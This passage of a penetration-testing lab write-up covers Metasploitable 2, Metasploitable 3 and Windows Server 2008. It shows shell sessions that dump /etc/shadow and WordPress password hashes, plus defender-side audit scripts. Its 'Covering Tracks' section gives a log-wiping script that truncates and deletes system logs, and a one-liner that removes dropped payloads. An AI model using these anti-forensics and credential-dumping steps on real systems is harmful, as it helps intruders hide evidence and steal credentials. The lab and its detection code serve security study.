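    """Parse hash:password lines into {hash: password}.

    Only the first ':' separates the fields: crypt(3) hashes never contain a
    colon, but a recovered password may.
    """
    cracked = {}
    for line in text.splitlines():
        if line.strip():
            digest, _, password = line.partition(":")
            cracked[digest] = password
    return cracked


def hash_algorithm(digest):
    """Name the crypt(3) scheme, or 'locked' for !, * and empty hash fields."""
    for prefix, name in ALGORITHMS.items():
        if digest.startswith(prefix):
            return name
    if digest in ("", "*") or digest.startswith("!"):
        return "locked"
    return "unknown"


def match_cracked(accounts, cracked):
    """Return {user: password} for each account whose hash is in the potfile."""
    return {user: cracked[h] for user, h in accounts.items() if h in cracked}


def unmatched_potfile_entries(accounts, cracked):
    """Potfile hashes that belong to no account in the credentials file."""
    known = set(accounts.values())
    return sorted(h for h in cracked if h not in known)


def audit_accounts(accounts):
    """Return (weak, locked): md5crypt users, and users with no usable hash."""
    weak = sorted(u for u, h in accounts.items() if hash_algorithm(h) == "md5crypt")
    locked = sorted(u for u, h in accounts.items() if hash_algorithm(h) == "locked")
    return weak, locked


if __name__ == "__main__":
    accounts = parse_unshadow(SAMPLE_CREDENTIALS)
    cracked = parse_potfile(SAMPLE_POTFILE)
    for user, password in match_cracked(accounts, cracked).items():
        print(f"{user}: {password} ({hash_algorithm(accounts[user])})")
    weak, locked = audit_accounts(accounts)
    print("md5crypt accounts to rehash:", ", ".join(weak))
    print("locked accounts:", ", ".join(locked))
    print("potfile hashes with no account here:",
          len(unmatched_potfile_entries(accounts, cracked)))
```

Point parse_unshadow at the real unshadow output and parse_potfile at john.pot or hashcat.potfile to get the same join for a whole machine.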

Note: No more attempts were made. An alternative would be SQL injection on the webserver for it to dump all the passwords. This will not be done here as this lab focuses on using Metasploit.

Covering Tracks

Erase the digital footprints that the attack might have left behind.

Metasploitable 2

Having a command shell open to 192.168.56.101 as root on Metasploitable 2, there are two files that must be looked at, .bash_history and reset_logs.sh, both found in the home directory of the superuser root.

.bash_history

Attempting to print the file on the console gives empty output. Listing the directory, including hidden files, shows the following.

ls -la
total 76
drwxr-xr-x 13 root root 4096 Sep  8 06:26 .
drwxr-xr-x 21 root root 4096 May 20  2012 ..
-rw-------  1 root root  324 Sep  8 06:26 .Xauthority
lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
-rw-r--r--  1 root root 2227 Oct 20  2007 .bashrc
drwx------  3 root root 4096 May 20  2012 .config
drwx------  2 root root 4096 May 20  2012 .filezilla
drwxr-xr-x  5 root root 4096 Sep  8 06:26 .fluxbox
drwx------  2 root root 4096 May 20  2012 .gconf
drwx------  2 root root 4096 May 20  2012 .gconfd
drwxr-xr-x  2 root root 4096 May 20  2012 .gstreamer-0.10
drwx------  4 root root 4096 May 20  2012 .mozilla
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
drwx------  5 root root 4096 May 20  2012 .purple
-rwx------  1 root root    4 May 20  2012 .rhosts
drwxr-xr-x  2 root root 4096 May 20  2012 .ssh
drwx------  2 root root 4096 Sep  8 06:26 .vnc
drwxr-xr-x  2 root root 4096 May 20  2012 Desktop
-rwx------  1 root root  401 May 20  2012 reset_logs.sh
-rw-r--r--  1 root root  138 Sep  8 06:26 vnc.log

The .bash_history entry is a symlink, also known as a soft link: a shortcut file that makes it appear as if the linked object is there.

In this scenario, the symlink points to /dev/null, a virtual device file that accepts writes and discards everything written to it, which is why it is known as the null device on any UNIX system.

It can be concluded that, if Metasploitable 2 is accessed as the superuser root, not a single command typed in the shell will be saved, so there is no need to erase the commands used during information gathering.

reset_logs.sh

This is also a really interesting file that is not normally found on a machine, whatever the operating system. The content of the file is the following.

#!/bin/sh

/etc/init.d/sysklogd stop
VARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp"
cd /var/log
for ii in $VARLOGS; do
  echo -n > $ii
  rm -f $ii.? $ii.?.gz
done

/etc/init.d/samba stop
rm -f /var/log/samba/*

rm -f /var/lib/dhcp3/*

for ii in /var/log/proftpd/* /var/log/postgresql/* /var/log/apache2/*; do
  echo -n > $ii
done

This is a shell script that can be launched simply by executing ./reset_logs.sh from the command line, as long as the permissions allow it. It first stops the system logger, then, for each log named in VARLOGS under /var/log, truncates the file to zero bytes and forcefully removes its rotated copies (.1, .2.gz and so on). Then it stops the Samba service, which provides file and print services to SMB and CIFS clients, and deletes its logs, as well as the files under /var/lib/dhcp3, and finally truncates the proftpd, postgresql and apache2 logs.

This concludes the Covering Tracks section for the Metasploitable 2 machine.

Windows Server 2008

Having a command shell open to 192.168.56.105 as Administrator or vagrant on the Windows Server 2008, there are no files like the ones found previously on Metasploitable 2. However, after some research, and with the command shell open, the logs can be deleted using a single command.

Linux 14.04

Within the machine, accessing it as vagrant, there is an interesting script named .bash_logout, which appears to erase all the commands from the .bash_history file.

This file takes care of this part of covering our tracks.

But what about the rest of the log files?

During the exploitation, the services used were ssh and ftp, although Drupalgeddon, an exploit against Drupal websites, was also investigated. Nothing was changed except for the execution of a payload that resides within the /var/www/html directory during the ProFTPD exploit. This can be checked by listing the directories and files within /var/log, taking note of the date each file and directory was last changed.

One option is to delete absolutely all the log files, which would raise red flags; the other is to truncate the log files to remove our presence from them. To do so, first check whether the files actually contain evidence of our unauthorized presence on the machine, then truncate them to roughly the size they had before the attack, to somewhat "restore" them. Of course, keep in mind that truncating the files may also erase what would be considered normal logs if the machine was in use during the attack.

Another good option is to use a script similar to the one that resets the logs on the Metasploitable 2 machine, adding the extra log files that need to be emptied of our IP address and presence, run it and immediately delete it. We could also go as far as deleting the bash history to make sure it is not kept by mistake, despite it cleaning itself up every time the user exits the shell.

Taking a script like the one used to reset all the logs on Metasploitable 2, and considering the services running on the machine, the following could be a good shell script to run.

#!/bin/sh

VARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp lastlog"
cd /var/log
for ii in $VARLOGS; do
  echo -n > $ii
  rm -f $ii.? $ii.?.gz
done

/etc/init.d/samba stop
rm -f -r /var/log/samba/*

rm -f /var/lib/dhcp3/*

for ii in /var/log/apache2/*; do
  echo -n > $ii
done

This script could also delete the payload, provided a line is added that removes all the files in the /var/www/html directory matching a regular expression.

cd /var/www/html 
find . -maxdepth 1 -print | grep -P "([A-Z]|[a-z]|\d){4,}\.php" | xargs -d"\n" rm

This first finds, in the current directory only, all the .php files whose name has four or more letters or digits, prints them on the command shell and removes the listed files.
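
As an added example that is not part of the lab write-up, the following Python script looks from the defender's side for the two artefacts that reset-style scripts like the ones above, and the /dev/null history link on Metasploitable 2, leave behind: empty logs with no rotated copy at all, and history files that are symlinks to /dev/null. It builds a constructed directory tree to run against, so it works offline; on a live host point the two functions at /var/log and the home directories instead.

```python
"""Find the traces a log-reset script leaves behind.

Added example, not part of the lab write-up.  reset_logs.sh above truncates
each log to zero bytes and deletes its rotated copies (syslog.1, syslog.2.gz,
...), and Metasploitable 2 hides root's shell history by linking
.bash_history to /dev/null.  Neither state is normal on a host that has been
running for a while, so a defender can look for exactly those two signs.
The fixture built here imitates /var/log and a home directory after such a
script has run; it is constructed, not taken from the lab machines.
"""
import os
import re
import tempfile
from pathlib import Path

# name.1, name.2.gz, ... as written by logrotate.
ROTATED = re.compile(r"^(?P<base>.+)\.\d+(\.gz)?$")


def find_truncated_logs(log_dir):
    """Return current logs that are empty and have no rotated copy at all.

    A log that logrotate just rotated is legitimately empty, but then
    name.1 (or name.1.gz) sits next to it.  Empty log plus no rotated copy
    is the signature of `echo -n > log; rm -f log.? log.?.gz`.  Treat hits
    as a heuristic: a log created at boot that nothing has written yet looks
    the same.
    """
    log_dir = Path(log_dir)
    rotated_bases = set()
    for entry in log_dir.iterdir():
        match = ROTATED.match(entry.name)
        if match:
            rotated_bases.add(match["base"])
    suspicious = []
    for entry in sorted(log_dir.iterdir()):
        if entry.is_symlink() or not entry.is_file() or ROTATED.match(entry.name):
            continue
        if entry.stat().st_size == 0 and entry.name not in rotated_bases:
            suspicious.append(entry.name)
    return suspicious


def find_null_history(home_dir):
    """Return shell history files in home_dir that are symlinks to /dev/null."""
    found = []
    for name in (".bash_history", ".sh_history", ".zsh_history"):
        path = Path(home_dir) / name
        if path.is_symlink() and os.readlink(path) == "/dev/null":
            found.append(name)
    return found


def build_fixture(root):
    """Create a constructed var/log and home tree under root; return both paths."""
    log = Path(root) / "var" / "log"
    log.mkdir(parents=True)
    # Truncated by the script and rotated copies removed: suspicious.
    for name in ("auth.log", "syslog", "wtmp"):
        (log / name).write_bytes(b"")
    # A log with content: nothing to report.
    (log / "kern.log").write_text("Sep 18 04:06:52 host kernel: eth0: link up\n")
    # Just rotated by logrotate, so the .1 copy still exists: benign.
    (log / "mail.log").write_bytes(b"")
    (log / "mail.log.1").write_text("Sep 17 00:00:01 host postfix/smtpd: connect\n")
    home = Path(root) / "root"
    home.mkdir()
    os.symlink("/dev/null", home / ".bash_history")
    return log, home


def demo():
    """Build the fixture in a temporary directory and return both findings."""
    with tempfile.TemporaryDirectory() as root:
        log, home = build_fixture(root)
        return find_truncated_logs(log), find_null_history(home)


if __name__ == "__main__":
    truncated, history = demo()
    print("empty logs with no rotated copy:", truncated)
    print("history files pointing at /dev/null:", history)
```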

Impersonating Metasploitable 2

Re-launch the attacks on the most recent vulnerable machines from the oldest vulnerable machine, with a Wireshark packet capture open, to compare how impersonating Metasploitable 2 changes the traffic.

Windows Server 2008

┌──(kali㉿kali)-[~]
└─$ ssh 192.168.56.101 -l msfadmin                                                                              1 ⚙
msfadmin@192.168.56.101's password: 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Tue Sep 14 11:41:44 2021
msfadmin@metasploitable:~$ mysql -u root -h 192.168.56.105
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.5.20-log MySQL Community Server (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| cards              | 
| mysql              | 
| performance_schema | 
| test               | 
| wordpress          | 
+--------------------+
6 rows in set (0.00 sec)

mysql> use wordpress;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------------+
| Tables_in_wordpress       |
+---------------------------+
| wp_commentmeta            | 
| wp_comments               | 
| wp_links                  | 
| wp_nf_objectmeta          | 
| wp_nf_objects             | 
| wp_nf_relationships       | 
| wp_ninja_forms_fav_fields | 
| wp_ninja_forms_fields     | 
| wp_options                | 
| wp_postmeta               | 
| wp_posts                  | 
| wp_term_relationships     | 
| wp_term_taxonomy          | 
| wp_termmeta               | 
| wp_terms                  | 
| wp_usermeta               | 
| wp_users                  | 
+---------------------------+
17 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email          | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$B2PFjjNJHOQwDzqrQxfX4GYzasKQoN0 | admin         | admin@example.com   |          | 2016-09-26 22:28:12 |                     |           0 | admin        | 
|  2 | vagrant    | $P$BMO//62Hj1IFeIr0XuJUqMmtBllnzN/ | vagrant       | vagrant@example.com |          | 2016-09-27 20:13:37 |                     |           0 | vagrant      | 
|  3 | user       | $P$B83ijKvzkiB6yZL8Ubpi35CMQHiQjv/ | user          | user@example.com    |          | 2016-09-27 20:14:08 |                     |           0 | user         | 
|  4 | manager    | $P$BvcrF0Y02JqJRkbXMREj/CBvP..21s1 | manager       | manager@example.com |          | 2016-09-27 20:15:14 |                     |           0 | manager      | 
+----+------------+------------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
4 rows in set (0.01 sec)

mysql> exit
Bye
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ exit
logout
Connection to 192.168.56.101 closed.

Linux 14.04

┌──(kali㉿kali)-[~]
└─$ ssh 192.168.56.101 -l msfadmin                                                                                                     1 ⚙
msfadmin@192.168.56.101's password: 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Tue Sep 14 17:04:15 2021 from 192.168.56.1
msfadmin@metasploitable:~$ ssh 192.168.56.106 -l vagrant
The authenticity of host '192.168.56.106 (192.168.56.106)' can't be established.
RSA key fingerprint is c9:ac:70:ef:f8:de:8b:a3:a3:44:ab:3d:32:0a:5c:6a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.106' (RSA) to the list of known hosts.
vagrant@192.168.56.106's password: 
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

 * Documentation:  https://help.ubuntu.com/
Last login: Fri Sep 17 17:47:16 2021
vagrant@metasploitable3-ub1404:~$ whoami
vagrant

vagrant@metasploitable3-ub1404:~$ hostname
metasploitable3-ub1404

vagrant@metasploitable3-ub1404:~$ ls -la
total 84584
drwxr-xr-x  7 vagrant vagrant     4096 Sep 14 15:22 .
drwxr-xr-x 18 root    root        4096 Oct 29  2020 ..
-rw-------  1 vagrant vagrant       99 Sep 17 17:49 .bash_history
-rw-r--r--  1 vagrant vagrant      220 Oct 29  2020 .bash_logout
-rw-r--r--  1 vagrant vagrant     3637 Oct 29  2020 .bashrc
drwxr-xr-x  3 root    root        4096 Oct 29  2020 .bundle
drwx------  2 vagrant vagrant     4096 Oct 29  2020 .cache
drwx------  2 root    root        4096 Oct 29  2020 .gnupg
drwxr-xr-x 55 vagrant vagrant     4096 Oct 29  2020 .npm
-rw-r--r--  1 vagrant vagrant      675 Oct 29  2020 .profile
drwx------  2 vagrant vagrant     4096 Sep 10 15:00 .ssh
-rw-r--r--  1 vagrant vagrant 86562816 Oct 29  2020 VBoxGuestAdditions.iso
-rw-r--r--  1 vagrant vagrant        5 Oct 29  2020 .vbox_version
vagrant@metasploitable3-ub1404:~$ tail .bash_logout 
# ~/.bash_logout: executed by bash(1) when login shell exits.

# when leaving the console clear the screen to increase privacy

if [ "$SHLVL" = 1 ]; then
    [ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q
fi

vagrant@metasploitable3-ub1404:~$ sudo cat /etc/shadow
root:!:18564:0:99999:7:::
daemon:*:16176:0:99999:7:::
bin:*:16176:0:99999:7:::
sys:*:16176:0:99999:7:::
sync:*:16176:0:99999:7:::
games:*:16176:0:99999:7:::
man:*:16176:0:99999:7:::
lp:*:16176:0:99999:7:::
mail:*:16176:0:99999:7:::
news:*:16176:0:99999:7:::
uucp:*:16176:0:99999:7:::
proxy:*:16176:0:99999:7:::
www-data:*:16176:0:99999:7:::
backup:*:16176:0:99999:7:::
list:*:16176:0:99999:7:::
irc:*:16176:0:99999:7:::
gnats:*:16176:0:99999:7:::
nobody:*:16176:0:99999:7:::
libuuid:!:16176:0:99999:7:::
syslog:*:16176:0:99999:7:::
messagebus:*:18564:0:99999:7:::
sshd:*:18564:0:99999:7:::
statd:*:18564:0:99999:7:::
vagrant:$6$NABMNgxO$T2lvEhArjOImjvROySq8vka/r8MWhhzNgT3Z5FS1LcPS5D325ESK5LjFJymb2jo/m4NmDg8aEl0TWWI3la.Y3/:18564:0:99999:7:::
dirmngr:*:18564:0:99999:7:::
leia_organa:$1$N6DIbGGZ$LpERCRfi8IXlNebhQuYLK/:18564:0:99999:7:::
luke_skywalker:$1$/7D55Ozb$Y/aKb.UNrDS2w7nZVq.Ll/:18564:0:99999:7:::
han_solo:$1$6jIF3qTC$7jEXfQsNENuWYeO6cK7m1.:18564:0:99999:7:::
artoo_detoo:$1$tfvzyRnv$mawnXAR4GgABt8rtn7Dfv.:18564:0:99999:7:::
c_three_pio:$1$lXx7tKuo$xuM4AxkByTUD78BaJdYdG.:18564:0:99999:7:::
ben_kenobi:$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1:18564:0:99999:7:::
darth_vader:$1$rLuMkR1R$YHumHRxhswnfO7eTUUfHJ.:18564:0:99999:7:::
anakin_skywalker:$1$jlpeszLc$PW4IPiuLTwiSH5YaTlRaB0:18564:0:99999:7:::
jarjar_binks:$1$SNokFi0c$F.SvjZQjYRSuoBuobRWMh1:18564:0:99999:7:::
lando_calrissian:$1$Af1ek3xT$nKc8jkJ30gMQWeW/6.ono0:18564:0:99999:7:::
boba_fett:$1$TjxlmV4j$k/rG1vb4.pj.z0yFWJ.ZD0:18564:0:99999:7:::
jabba_hutt:$1$9rpNcs3v$//v2ltj5MYhfUOHYVAzjD/:18564:0:99999:7:::
greedo:$1$vOU.f3Tj$tsgBZJbBS4JwtchsRUW0a1:18564:0:99999:7:::
chewbacca:$1$.qt4t8zH$RdKbdafuqc7rYiDXSoQCI.:18564:0:99999:7:::
kylo_ren:$1$rpvxsssI$hOBC/qL92d0GgmD/uSELx.:18564:0:99999:7:::
mysql:!:18564:0:99999:7:::
avahi:*:18564:0:99999:7:::
colord:*:18564:0:99999:7:::
vboxadd:!:18880::::::

vagrant@metasploitable3-ub1404:~$ sudo cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/bin/false
vagrant:x:900:900:vagrant,,,:/home/vagrant:/bin/bash
dirmngr:x:105:111::/var/cache/dirmngr:/bin/sh
leia_organa:x:1111:100::/home/leia_organa:/bin/bash
luke_skywalker:x:1112:100::/home/luke_skywalker:/bin/bash
han_solo:x:1113:100::/home/han_solo:/bin/bash
artoo_detoo:x:1114:100::/home/artoo_detoo:/bin/bash
c_three_pio:x:1115:100::/home/c_three_pio:/bin/bash
ben_kenobi:x:1116:100::/home/ben_kenobi:/bin/bash
darth_vader:x:1117:100::/home/darth_vader:/bin/bash
anakin_skywalker:x:1118:100::/home/anakin_skywalker:/bin/bash
jarjar_binks:x:1119:100::/home/jarjar_binks:/bin/bash
lando_calrissian:x:1120:100::/home/lando_calrissian:/bin/bash
boba_fett:x:1121:100::/home/boba_fett:/bin/bash
jabba_hutt:x:1122:100::/home/jabba_hutt:/bin/bash
greedo:x:1123:100::/home/greedo:/bin/bash
chewbacca:x:1124:100::/home/chewbacca:/bin/bash
kylo_ren:x:1125:100::/home/kylo_ren:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
avahi:x:107:114:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:108:116:colord colour management daemon,,,:/var/lib/colord:/bin/false
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
vagrant@metasploitable3-ub1404:~$ exit
logout
Connection to 192.168.56.106 closed.
msfadmin@metasploitable:~$ exit
logout
Connection to 192.168.56.101 closed.
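
The /etc/shadow and /etc/passwd listings above show which accounts can log in and which hash scheme protects each one: `$1$` MD5-crypt for the Star Wars users, `$6$` SHA-512-crypt for vagrant, and `!` or `*` for locked accounts. The script below is an added example, not code from this lab or from Metasploitable; it parses both files in that format and reports the hygiene problems a defender would want to catch before hashes like these are exported and fed to Hashcat or John the Ripper (as described under Exploits): passwd entries with no shadow entry, extra UID 0 accounts, empty password fields, and login-capable accounts protected by a weak hash scheme. The sample lines embedded in it are constructed for the example and the hash bodies are placeholders.

```python
"""Audit /etc/passwd and /etc/shadow for weak credential hygiene.

Added example for this writeup (not from the lab or Metasploitable). It reads
both files in the layout shown above and flags: passwd users with no shadow
entry, extra UID 0 accounts, empty password fields, and login-capable accounts
whose hash uses a weak scheme ($1$ MD5-crypt or 13-character DES-crypt).
"""
from dataclasses import dataclass
from typing import Dict, List

# Shells that do not give an interactive login; anything else (including the
# /bin/sh used by dirmngr in the listing above) is treated as login-capable.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}

# crypt(3) prefixes and how a defender should regard them.
HASH_SCHEMES = {
    "$1$": "md5crypt (weak)", "$5$": "sha256crypt", "$6$": "sha512crypt",
    "$y$": "yescrypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
}


@dataclass
class Finding:
    user: str
    issue: str


def parse_passwd(text: str) -> Dict[str, dict]:
    """Map user name -> {uid, shell} from /etc/passwd content."""
    users: Dict[str, dict] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:  # blank or malformed line: skip, do not crash
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        users[name] = {"uid": int(uid), "shell": shell}
    return users


def parse_shadow(text: str) -> Dict[str, str]:
    """Map user name -> password field from /etc/shadow content."""
    hashes: Dict[str, str] = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    return hashes


def hash_scheme(pw: str) -> str:
    """Classify a shadow password field by its crypt(3) prefix."""
    if pw == "":
        return "empty"
    if pw.startswith(("!", "*")):
        return "locked"
    for prefix, name in HASH_SCHEMES.items():
        if pw.startswith(prefix):
            return name
    if len(pw) == 13 and not pw.startswith("$"):
        return "descrypt (weak)"
    return "unknown"


def audit(passwd_text: str, shadow_text: str) -> List[Finding]:
    """Cross-check passwd against shadow; findings come back in passwd order."""
    users = parse_passwd(passwd_text)
    hashes = parse_shadow(shadow_text)
    findings: List[Finding] = []
    for name, info in users.items():
        if info["uid"] == 0 and name != "root":
            findings.append(Finding(name, "additional UID 0 account"))
        if name not in hashes:
            findings.append(Finding(name, "no shadow entry"))
            continue
        scheme = hash_scheme(hashes[name])
        interactive = info["shell"] not in NOLOGIN_SHELLS
        if scheme == "empty":
            findings.append(Finding(name, "empty password field (passwordless login)"))
        elif interactive and "weak" in scheme:
            findings.append(Finding(name, f"weak hash scheme: {scheme}"))
    return findings


# Constructed sample input in the same layout as the listings above;
# the hash bodies are placeholders, not real digests.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
vagrant:x:900:900:vagrant,,,:/home/vagrant:/bin/bash
leia_organa:x:1111:100::/home/leia_organa:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
guest:x:1200:100::/home/guest:/bin/bash
toor:x:0:0::/root:/bin/bash
"""

SHADOW_SAMPLE = """\
root:!:18564:0:99999:7:::
daemon:*:16176:0:99999:7:::
vagrant:$6$EXAMPLESALT$EXAMPLEHASHVALUE:18564:0:99999:7:::
leia_organa:$1$EXAMPLESALT$EXAMPLEHASH:18564:0:99999:7:::
mysql:!:18564:0:99999:7:::
guest::18564:0:99999:7:::
"""

if __name__ == "__main__":
    for f in audit(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(f"{f.user}: {f.issue}")
```

Run against the real files with `sudo python3 audit.py` after replacing the samples with `open("/etc/passwd").read()` and `open("/etc/shadow").read()`. On the Ubuntu 14.04 host above, every Star Wars account would be reported for MD5-crypt, which is the concrete reason those hashes crack so quickly; the `!` and `*` entries are locked and produce no finding.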

Exploits

List all the exploits used on the three different vulnerable machines. Rate them from 1 to 6 stars depending on the negative impact of each on the security of the machine.

⭐⭐⭐⭐⭐➕ The worst vulnerability is on Metasploitable 2, which gives away a superuser's credentials in the Telnet banner before login.

⭐⭐⭐⭐⭐➕ Metasploitable 2 and Windows 2008 Server both have password-less superuser (root) accounts, allowing attackers to bypass authentication and gather everything that is kept in the MySQL server of each respective machine. This exploit is so valuable to an attacker that they will probably not need to do anything else to the machine, having gained all the information needed from just one simple exploit.

⭐⭐⭐⭐⭐ Lowering the bar a little, Metasploitable 2 is also vulnerable to a vsFTPd backdoor that opens a command shell and gives access to certain files whose information can be used to run an SSH login scan with a set of usernames and passwords. Since, unfortunately, the superuser accounts use the username as the account's password, this again opens a command shell and lets the attacker gather the credentials of all accounts, to be cracked with tools like Hashcat and John the Ripper.

⭐⭐⭐⭐ ProFTPd Command Execution on Linux 14.04. A command shell can be opened and manual enumeration performed by the attacker to gather information on the user accounts and their permissions. Later, an SSH login scan can be launched with a variety of usernames and passwords, yielding at least a handful of correct username-password pairs that leave the machine exposed to whatever the attacker desires.

⭐⭐⭐ There are a handful of vulnerabilities on Metasploitable 2 that allow the attacker to enumerate the local domain and its users, as well as launch denial of service (DoS) attacks.

⭐⭐⭐ Metasploitable 2 is, by far, the most vulnerable machine: for each port an exploit exists that allows the attacker to open a shell, whether because of a backdoor, badly configured superuser account protection, payload execution or command injection.